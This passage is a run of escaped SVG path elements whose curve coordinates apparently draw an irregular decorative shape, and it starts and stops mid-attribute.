d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n <path d=\"M337.8,62.2h-4.2c0-.1-1.3-.2-1.4,0,3.7.1,1.5.5,6,.5C340.3,62.4,337.9,62.5,337.8,62.2Z\"></path>\n <path d=\"M292.9,60.2c-3.4.2-6.4.4-10.7.5,2,.2,5.3.2,7.3.4.2-.2-2.1-.3-3.1-.4C290.9,60.8,295.4,60.6,292.9,60.2Z\"></path>\n <path d=\"M113.6,56.9c6,.1,2.9-.4.8-.6-3.4.1-6.2-.5-7.1-.2C112.3,56.3,115.6,56.6,113.6,56.9Z\"></path>\n <path d=\"M88.3,51.7c-3.5,0-9.8.1-8.1.3,6.5-.3,8.6.6,8.7.4C89.9,52.4,91.5,51.9,88.3,51.7Z\"></path>\n <path d=\"M335.9,56.9c3.4.5-1,.3-3.8.5,4.4,0,4.5.3,7.3.4C339.3,57.4,338.9,57.1,335.9,56.9Z\"></path>\n <path d=\"M197.3,54.2c-2.3,0-.2-.4,1-.4-1.4.2,2.7.6,3,.3-3.2-.5-4.8-.3-8.9-.6C192.4,53.7,194.7,54.5,197.3,54.2Z\"></path>\n <path d=\"M106,51.4c1.4.5-2,.6-4.9.8,9.2.2,6.5-.5,7.6-.8-3.5-.1-3.4-.5-8.8-.5C107.3,51.2,99.1,51.7,106,51.4Z\"></path>\n <path d=\"M37.7,49.5c-3.1-.3,1-.5-2-.7.2.4-8.7.5-3.3,1C31.6,49.5,33.9,49.2,37.7,49.5Z\"></path>\n <path d=\"M0,48.7H0c2.6.2,4.4.2,3.7.2C2.5,48.8,1.3,48.7,0,48.7Z\"></path>\n <path d=\"M0,46.8a37.89,37.89,0,0,0,5.3.7A36.44,36.44,0,0,0,0,46.6Z\"></path>\n <path d=\"M312.8,54.3c.8-.8-.2-1-4.2-1.6,1.3.5,1.6.5-.7.7C317.3,53.7,306.3,54.1,312.8,54.3Z\"></path>\n <path d=\"M272.5,52.7c-1.9-.6,4-1.5-4.6-2.1C273.2,51.3,266.7,51.9,272.5,52.7Z\"></path>\n <path d=\"M195.9,51a15.4,15.4,0,0,1,2.8.1c-.2-.2.8-.3,2.5-.3.1.1.3.1,1.5.1l-.2-.2a27.48,27.48,0,0,1-3-.2C201.7,51,190.3,50.6,195.9,51Z\"></path>\n <path d=\"M357.8,51.8c1.1,0,1.7.1,1.6.3-2.5-.1-8.2,0-4,.2C358.7,52.4,363.6,51.7,357.8,51.8Z\"></path>\n <path d=\"M340.4,51c4,.3-3.5.5.7.8l3.7-.6C341.1,51.3,341.6,50.6,340.4,51Z\"></path>\n <path d=\"M292.6,50.3c0-.1.1-.1,1.3-.1.9,0,1.7,0,1.3-.1-1.7-.1-1.7-.2-1.7-.4,4.9.3,5.2.1,5.5-.1,3.1.2,8.5.2,7.5.6,5.6-.1,6.9-.6,10.4-.9-6.6-.1-5.6.5-12.2.4,1-.4-8-.2-7.5-.6-.4-.5,6,.1,5.3-.3-.5-.4-4.5.1-4.3-.2,4.5-.1-3.2-.3-1.9-.6.8,0,5.2-.2,5.7.1s-1.7.2-2.5.3c2.5,0,4.4.1,5.8.2-.6-.4.5-1.1-7-1.7-3.2.2,2.3.3,1.9.6-5.6.2-7.9,0-4.5-.4-5.8-.1-4.5.5-.7.7a20.82,20.82,0,0,0-4.1.1c1.7.1,4,.1,4.4.2.2.2-.8.3-2.5.3-2.3-.3-4.8-.5-7.6-.7-2.3.1,4.4.8,6.2.7,0,.3,2.5.4,3.3.6-5.3-.1,1.5.5-4.1.1C294.3,49.7,288.5,50,292.6,50.3Z\"></path>\n <path d=\"M276.4,49.3c3.4-.1,7.9-.1,9.4-.3C281.2,49,277,49,276.4,49.3Z\"></path>\n <path d=\"M339.8,50.3c1.2-.2-5.2-.6-5.9-.4,6.9.2-.1.3-1,.4C337.4,50.6,335.4,50.1,339.8,50.3Z\"></path>\n <path d=\"M297.3,41.5c-1-.4-5.8-.9.4-1.1-7.9-.1-5.8-.8-9.4-1.2-7.5.2,8.4,1.2-.1,1.4a7.8,7.8,0,0,0-3-.3c-1.3.5,3.6,1.6-6.9,1.6,5.2.4,5.1.7-.7.7a114.26,114.26,0,0,0,13.6-.3c.3.2,4.8.2,4.5.4a32.67,32.67,0,0,0-3.8.5c2.5,0,4.4.1,5.8.2.9-.3-2.3-.3-1.9-.6,2.1.1,2.6.2,4.5.3.6-.4-3.4-.5-3.5-.8,2.7.1,4.8.2,5.9.3-2.5.6,10.4,1.4,5.7,1.8,5.7-.1,1.3-.7,3.4-.9-1-.2-6.7-.1-7.3-.4l-.3-.3a62.16,62.16,0,0,1,10.2.6c3-.2-4.4-.5-4.9-.9a16.86,16.86,0,0,1,5.3-.3c2.8.3,6.8.4,9,.7a61.84,61.84,0,0,1-7.2-.3c-.4.6,4.7.3,6.2.7.4.4-1.6.6-3.5.8,1.7.1,4,.1,4.4.2-6.7,1-1.8,2.8-9.1,3.8-1.7-.1-1.7-.2-1.7-.4-2.6,0-4.7,0-5.5.1,3.8.4,9.8.6,14.7.9.7.6-4.8-.1-5.3.3,3.6.3,7,.1,11.3.3-4.6-.5.2-.8-5.2-1.2-1.4.1-.1.4-4,.2a53.56,53.56,0,0,1,7.9-.5c-1.8-.5-2.2-1-1-1.1,2.7-.2,2.8.1,5.8.2.7-.4-7-.4-6.3-.8,2.6,0,4.7,0,5.5-.1-9.7-.1,6.2-.6-2.3-1-1.8.1-.2.5-3.8.5-1.1-.6,3.4-.8,6-1.1-1.7-.1-4-.1-4.3-.2,5.8-.3-1.3-1.1,2.5-1.9-6.6-.2-3-.4-3.4-.7-4.4-.2-4,.1-8.4-.1,2.7.5-.6.2-5.3.3-2.4-.8-9.2-1.2-14.1-1.8C297.4,40.6,302.3,41.3,297.3,41.5Z\"></path>\n <path d=\"M333.6,49.5c1.7,0-1.4-.5,5.4-.2,0,.2.7.4,1.6.3-.1-.2-.9-.3-1.7-.4-4.5-.2-5.3.1-8.5-.2C330.8,49.2,329.4,49.5,333.6,49.5Z\"></path>\n <path d=\"M367.4,48.5a78.32,78.32,0,0,0-8.1.3c.9.1,5.7.4,5.7.1C359.8,48.6,368.4,48.8,367.4,48.5Z\"></path>\n <path d=\"M275.4,46.6c4.2.1,10.6-.1,8.1-.3-2.5,0-3.7.2-6.8.2-.3-.2-.1-.4-3.1-.4C273.4,46.3,275.4,46.4,275.4,46.6Z\"></path>\n <path d=\"M302.7,46a24.32,24.32,0,0,1,2.7,0,4,4,0,0,0,1.6.3c-.1-.5,2.2-.9-5.1-1.1C304.7,45.5,302.5,45.9,302.7,46Z\"></path>\n <path d=\"M284.4,44.2c-5-.1-4.1.3-6.6.4,2.4,0,3.8.2,4.3.1C277.9,44.4,286.3,44.5,284.4,44.2Z\"></path>\n <path d=\"M364.1,44.8c-.4.3,2.8.3,1.9.6,7.1.2.5-.3,3.9-.4,3.2,0,1.9.4,4.5.4C375,44.8,366.4,45,364.1,44.8Z\"></path>\n <path d=\"M14.4,32.6l.2.2c8.3.1,1.3.7,3.6,1,0-.1.1-.1,1.3-.1.3.1,0,.3,1.7.4,2-.4-1.8-.9-2.7-1.5Z\"></path>\n <path d=\"M331.4,40.7c3.3.2,4.1-.4,7,0a20.27,20.27,0,0,0-2.7,0c9,0,1.7-.5,3.4-.9a61.71,61.71,0,0,0-6.8.2C338.5,40.4,332.5,40.6,331.4,40.7Z\"></path>\n <path d=\"M275.3,38.6c5,.3-1,.6,6.2.8-.7-.3-3.2-.5-.6-.7C277.9,38.8,275.4,38.3,275.3,38.6Z\"></path>\n <path d=\"M291.1,39.2c-.1-.1-.2-.3-.4-.4-2.1-.1-7.2,0-7.2-.3,1.2.1,2.7-.7-.8-.9-3,.3,2.4.9-2,.9C284.8,38.7,286.3,39,291.1,39.2Z\"></path>\n <path d=\"M347,39.6c2.6-.2-1.3-.5,1.4-.7-3.9.2-6.5,0-7.2.4C343.2,39.4,344.1,39.5,347,39.6Z\"></path>\n <path d=\"M284.9,36.9c1.6.1,10.2.7,8.8.5-4.1-.2-.6-.5.9-.5a33.9,33.9,0,0,1-4.5-.3c-2.5.1,2.2.4-2.4.4C286.1,36.9,285.4,36.7,284.9,36.9Z\"></path>\n <path d=\"M339.4,37.2c1.1,0-2.9-1.2-3.7-1.1C335.2,36.9,335.9,36.8,339.4,37.2Z\"></path>\n <path d=\"M356.1,37.3c-1.7-.1-1-.1-.2-.2a82.15,82.15,0,0,0-9.8-.1C348.7,37,355,37.3,356.1,37.3Z\"></path>\n <path d=\"M328.3,34c3.8-.4,6.4.2,11.2.1C338.9,33.6,326.7,33.5,328.3,34Z\"></path>\n <path d=\"M341.4,33.2c-.6-.5,9.6-.7,1.7-1.2C347.4,32.8,335.6,32.6,341.4,33.2Z\"></path>\n <path d=\"M145.4,77.3a2.39,2.39,0,0,0-.5-.6c-3.8-.3-4.9,0-7.2-.3.2-.2,2.2-.2,5.5-.1a19.89,19.89,0,0,0-6.5-1c1.7.7-4,.9.2,1.7C141,77.1,141.2,77.1,145.4,77.3Z\"></path>\n <path d=\"M231.3,75.4c-6.2-.2-7.8-.1-11.1,0,.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3C224.8,75.5,229.3,75.9,231.3,75.4Z\"></path>\n <path d=\"M212.5,69.8c-5.6.1-.3.7,2.3,1-.2.1-1.4.1-2.6.2-2.3-.1-.1-.5-4.6-.5,2.2.8.8.9-.1,1.4,5.7-.4,8.1.4,12.8.3-4.8-.3,8.1-.3,2.2-.7-2.2.2-5.9-.6-3.5-.8-2.1-.3-5.2,0-5.8-.2-2.3-.5,2.4-.5,5.4-.2a81.66,81.66,0,0,0-11.9-.9C205.7,69.6,211.8,69.6,212.5,69.8Z\"></path>\n <path d=\"M173,70.8c.1,0,.1-.1,0,0C173,70.7,172.9,70.8,173,70.8Z\"></path>\n <path d=\"M178.1,68.7c-11-.1-4.3,1.3-5.1,2a18.73,18.73,0,0,1,4.1,0c-4.4.4,3.2,1.3,3,1.8,1.1-.6,2.6-1.4-1.7-1.9,3.6-.1,2.4-.3.8-.6,2.5,0,4.5.1,5.8.2a66.74,66.74,0,0,0-11-1.4C176.3,68.9,179,69,178.1,68.7Z\"></path>\n <path d=\"M1494.6,118.8c1.9.1,2.8.2,5.8.2,1.1-.1,1.6-.3.9-.5C1497.4,118.5,1497.6,118.8,1494.6,118.8Z\"></path>\n <path d=\"M1495.9,117.1c1.1.5-1.1,1.2,5.3,1.3C1500.3,118,1504.4,117.5,1495.9,117.1Z\"></path>\n <path d=\"M1463.9,110.8c-6.5-.3-4.6.5-.9.5C1462.3,111.1,1462.9,110.9,1463.9,110.8Z\"></path>\n <path d=\"M1495,109.8c-2.4.1-.2.6,2.1.8C1496,110.3,1498.2,109.9,1495,109.8Z\"></path>\n <path d=\"M1692,112.7c.1.8-2.5-.3-7.2-.3a38.09,38.09,0,0,0,6.3.8,10.17,10.17,0,0,1,2.7,0C1693.4,113,1693.9,112.7,1692,112.7Z\"></path>\n <path d=\"M1463,106.5c-4.5-.1-4.6.2-5.2.4a16.67,16.67,0,0,0,4.7.7c.9-.3-2.5-.4-3.3-.6,3.2.1,5.3.1,5.5-.1C1463,106.8,1463,106.7,1463,106.5Z\"></path>\n <path d=\"M1472.4,99.9c-3-.2-1.8,0-5.7-.1,1,.3,1.1,1.1-3.7.6,6.8,0-.4-.9,3.2-1.1a38.82,38.82,0,0,0,5.9.3c-1.2-.4-.2-.3-4.7-.7,1.8-.3,6.5.4,5.5-.1-.2-.4-4.4,0-3.3-.6,4.3.3,3.6-1-2.5-1.3,0,.5-1.5.6,2.3,1-11.1,1.2-12.1,3.5-6.2,5.5-2.9.1-2.9.4-5.1.5,4.5.8-4.6,2,4.8,2.3-2.8-1,1.5-2.4.9-3.7-.3-.6-4.1-1.4,1.4-1.5-.3.1-1.8.2-1,.4,8.9.1-.5-.8,3.4-.9.9.4,3.9.2,1.9.6,3.8.1,3.5-.1,3.9-.3C1470.8,100.6,1469.7,99.9,1472.4,99.9Z\"></path>\n <path d=\"M1701.7,100a23.82,23.82,0,0,1-2.8-.1,20.27,20.27,0,0,0-2.7,0c-3.3,1.9-8,3.1-7.5,5.7,2.3.2,6.1.3,7.5.6-7.8-.4-.8.9-8.1.3-.7.5-.9.9,2.6,1.4-1.6-.6,3.5-.1,5.6,0-.3-.2,0-.3,1-.4-2.4-.3-6.1-.2-7.3-.4,1.5-.4,4.7-.2,9.3-.4-3.1-.5.2-.5.6-.9-8.1-.2-1.1-.8-5.2-1.2,1.8,0,1.8-.1,4.2,0-2.2-.4-.9-.8.4-1.1-1.7-.1-3.3-.2-4.5-.3C1701.6,102.1,1696.9,100.8,1701.7,100Z\"></path>\n <path d=\"M1710.2,106.5c-3.6-.1-5.3,0-5.3.3,2.6.1,3.1.2,1.6.3,1.4,0,2.8.1,4.2.1C1709.2,106.8,1709.2,106.8,1710.2,106.5Z\"></path>\n <path d=\"M1705,103.8c1.4.4-1.3.5-.6.9C1710.6,104.9,1709.3,103.9,1705,103.8Z\"></path>\n <path d=\"M1697.2,99.7c-.1-.4,2.4-.6,6.4-.6C1698.4,98.6,1692,99.5,1697.2,99.7Z\"></path>\n <path d=\"M1653.7,97.6c1.4.4-5.1.7-.4,1.1C1652.9,98.3,1657.8,98,1653.7,97.6Z\"></path>\n <path d=\"M1326.8,90.8c1.4,0,2.8.1,4.2.1.4-.2,2.7-.5-2-.7C1328.4,90.4,1325.8,90.4,1326.8,90.8Z\"></path>\n <path d=\"M1684,97.3c0,.3.9.6,3.4.7C1686.4,97.8,1689.1,97.3,1684,97.3Z\"></path>\n <path d=\"M1696.1,95.3c10.3.3.8-.7,4.6-1.1C1692.8,94.2,1699.1,94.9,1696.1,95.3Z\"></path>\n <path d=\"M1742,95.2c-1.3.1-2.4.6.7.8C1743.9,96,1745,95.4,1742,95.2Z\"></path>\n <path d=\"M1715.4,93.4c1.1.1,2.8.1,3,.2-1.1,0-1.6.1-1.2.2,3.8.1,3.5-.1,3.9-.3C1717.4,93.4,1716.3,93.1,1715.4,93.4Z\"></path>\n <path d=\"M1742.4,91c.9.2-1.1.5,1.9.6C1746.4,91.5,1748.7,91.1,1742.4,91Z\"></path>\n <path d=\"M1711.2,90.3c2-.1,1.8-.7-3.4-.7C1709.3,89.8,1708.8,90.1,1711.2,90.3Z\"></path>\n <path d=\"M1741.4,88.2c-3.6-.1-5.1.5-2.2.6C1739.7,88.6,1742.4,88.6,1741.4,88.2Z\"></path>\n <path d=\"M1738,87.6a8.94,8.94,0,0,0,3.2.5c.3-.2,1.5-.5-.6-.7A6.92,6.92,0,0,1,1738,87.6Z\"></path>\n <path d=\"M1729.4,85.7c-.9.3,2.5.4,4.7.5C1735.7,85.9,1734.6,85.6,1729.4,85.7Z\"></path>\n <path d=\"M1877.1,86.3c4,.1,3.8-.2,3.7-.5C1876.4,85.7,1876.5,86,1877.1,86.3Z\"></path>\n <path d=\"M1704.4,77.8c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C1708.1,77.7,1703,77.4,1704.4,77.8Z\"></path>\n <path d=\"M1724.7,72.5a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C1726,73.3,1728.1,72.7,1724.7,72.5Z\"></path>\n <path d=\"M1811.9,73.8c0,.2-3.8.8,2.2.9C1813,74.4,1815.2,73.9,1811.9,73.8Z\"></path>\n <path d=\"M1705.8,71.5c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C1715.2,71.8,1705.3,71.2,1705.8,71.5Z\"></path>\n <path d=\"M1801.3,72.8c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C1798.9,73,1802.1,73.1,1801.3,72.8Z\"></path>\n <path d=\"M1719.7,71.5c.2-.2,2.6-.7-1-1.1C1718.2,70.6,1716.4,71.1,1719.7,71.5Z\"></path>\n <path d=\"M1711.3,69.9c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1C1709.6,69.9,1711.4,70,1711.3,69.9Z\"></path>\n <path d=\"M1864.6,72c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C1858.3,72,1866.3,72.5,1864.6,72Z\"></path>\n <path d=\"M1725.4,68.6c.2-.5-1.5-.8-7.8-.9.4.2-.1.4,1.8.5C1723.9,67.7,1721.5,68.5,1725.4,68.6Z\"></path>\n <path d=\"M1814.1,68.4c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C1812.8,68.6,1813.1,68.5,1814.1,68.4Z\"></path>\n <path d=\"M1758.3,63.3c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C1755.2,63.5,1762.2,63.7,1758.3,63.3Z\"></path>\n <path d=\"M1911.3,66.7c3.6-.1,3.2-.7-2.2-.9C1910.8,66.1,1907.6,66.5,1911.3,66.7Z\"></path>\n <path d=\"M1866.7,65a26.2,26.2,0,0,1-2.8-.1c-.9,0-1.6,0-1.3.1,4.7.1-3.8.4,3.2.5C1864.3,65.2,1867.5,65.3,1866.7,65Z\"></path>\n <path d=\"M1854.4,63.6c0,.1.5.8,1.8.5-2.4-.5,8.7-.2,2.1-.7C1858.8,63.6,1857.5,63.7,1854.4,63.6Z\"></path>\n <path d=\"M1836.4,63.8c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A21.47,21.47,0,0,1,1836.4,63.8Z\"></path>\n <path d=\"M1810.8,61.5c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A27.87,27.87,0,0,0,1810.8,61.5Z\"></path>\n <path d=\"M1865.5,60.5c.1.1.3.1,1.5.1l-.4-.4c-2.7,0-6.1-.1-5.4.2A41.15,41.15,0,0,1,1865.5,60.5Z\"></path>\n <path d=\"M1726.5,52.4c-.3-.4,3.6-.4,5-.7C1725.3,51.5,1722.5,52.1,1726.5,52.4Z\"></path>\n <path d=\"M1768,50.6a4.37,4.37,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C1766.5,50.4,1764.4,50.9,1768,50.6Z\"></path>\n <path d=\"M1743.9,50.1c.4-.3,4.1-.4,3.5-.8C1743.5,49.2,1741.8,49.9,1743.9,50.1Z\"></path>\n <path d=\"M1757.7,48.4c-4.3-.1-5.3.1-8.2.1a10.29,10.29,0,0,0,3.3.6C1753.2,48.8,1758.9,49,1757.7,48.4Z\"></path>\n <path d=\"M1716.4,47.3c-.8.3-1.1,1,5.2,1.2C1719.6,48.1,1718.9,47.7,1716.4,47.3Z\"></path>\n <path d=\"M1708.9,48.2c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C1707.1,48.2,1705.9,48,1708.9,48.2Z\"></path>\n <path d=\"M1777.5,48.8a45.38,45.38,0,0,0,4.9.9C1784.6,49.5,1783.6,48.8,1777.5,48.8Z\"></path>\n <path d=\"M1861.2,50.9c-1.6.1-5.2.1-7,0C1853.6,51.5,1865.8,51.2,1861.2,50.9Z\"></path>\n <path d=\"M1742,48c2.5-.2,5-.1,2.3-.5C1740.8,47.3,1738.8,47.8,1742,48Z\"></path>\n <path d=\"M1786.2,47.8c1,.4,2.4.7,6.4.9C1791.3,48.3,1790.3,48,1786.2,47.8Z\"></path>\n <path d=\"M1746,46.2c.8-.3,1.6-.6-2.1-.8C1745.5,45.8,1740.4,46,1746,46.2Z\"></path>\n <path d=\"M1747.7,43.4c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C1744.5,43.1,1745.6,43.3,1747.7,43.4Z\"></path>\n <path d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.